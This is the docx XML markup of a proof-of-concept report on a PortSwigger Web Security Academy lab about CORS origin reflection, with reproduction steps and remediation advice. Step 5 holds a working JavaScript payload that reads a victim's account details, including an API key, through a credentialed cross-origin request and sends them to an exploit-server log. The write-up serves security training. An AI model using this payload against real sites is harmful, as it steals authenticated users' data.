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CORS Lab 1 — Basic Origin Reflection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Proof of Concept Report — PortSwigger Web Security Academy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Prepared by: Aakash Singh   |   Date: May 31, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A237E" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="320" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1A237E" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="12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Vulnerability Information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Aakash Singh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31,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Lab 1 — Basic Origin Reflection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PortSwigger Web Security Academy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Vulnerability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Cross-Origin Resource Sharing (CORS) Misconfiguration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CWE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CWE-942</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1A237E" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="12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Impact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server reflects any supplied Origin header back in Access-Control-Allow-Origin while also setting Access-Control-Allow-Credentials: true. An attacker-controlled website can silently steal authenticated user data (e.g., API keys) by making cross-origin credentialed requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1A237E" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="12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Reproduction Steps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Log in to the lab account and navigate to the My Account page.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In Burp Suite HTTP history, locate the GET /accountDetails request and observe Access-Control-Allow-Credentials: true in the response.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Send the request to Repeater and add the header Origin: https://example.com.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Observe that the response reflects the supplied origin in Access-Control-Allow-Origin.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5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Exploit Server, insert the following JavaScript payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A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var req = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A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req.onload = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A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location = '/log?key=' + this.responseText;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A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};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A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req.open('GET','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A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req.withCredentials = true;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A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req.send();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E2A3A" w:val="clear"/>
        <w:spacing w:after="80" w:before="8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&lt;/script&gt;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6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Click 'View exploit' — observe redirect to /log?key=... containing account data.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7: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Click 'Deliver exploit to victim', then check the Access log.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8: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy the victim's API key and submit — lab solved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1A237E" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="12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Evidence Screenshots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1: Login &amp; finding GET /accountDetails — Access-Control-Allow-Credentials: true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2: CORS test in Burp Repeater — Origin reflected in response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3: Exploit Server — JavaScript payload to steal account details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4: Victim API key retrieved from Access log — lab solved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E7D32" w:sz="12" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="12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Remediation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Implement a strict origin allowlist. Never reflect arbitrary Origin values. Do not combine Access-Control-Allow-Credentials: true with a wildcard or reflected origin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4" w:space="1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Confidential — Prepared by Aakash Singh | Security Research POC</w:t>
      </w:r>
    </w:p>
    <w:sectPr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077b49e1f9bd9f07533abe450335c881837c26e.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4a0bf2ea6525b0fa0e5232cacddf5297267ffea5.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/b921d7999d7638e6133d7e757c17ab4263286d9a.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f9708683383390cc941ab6ea9220f3f5e5bd4811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2026-05-31T18:32:03.719Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-31T18:32:03.719Z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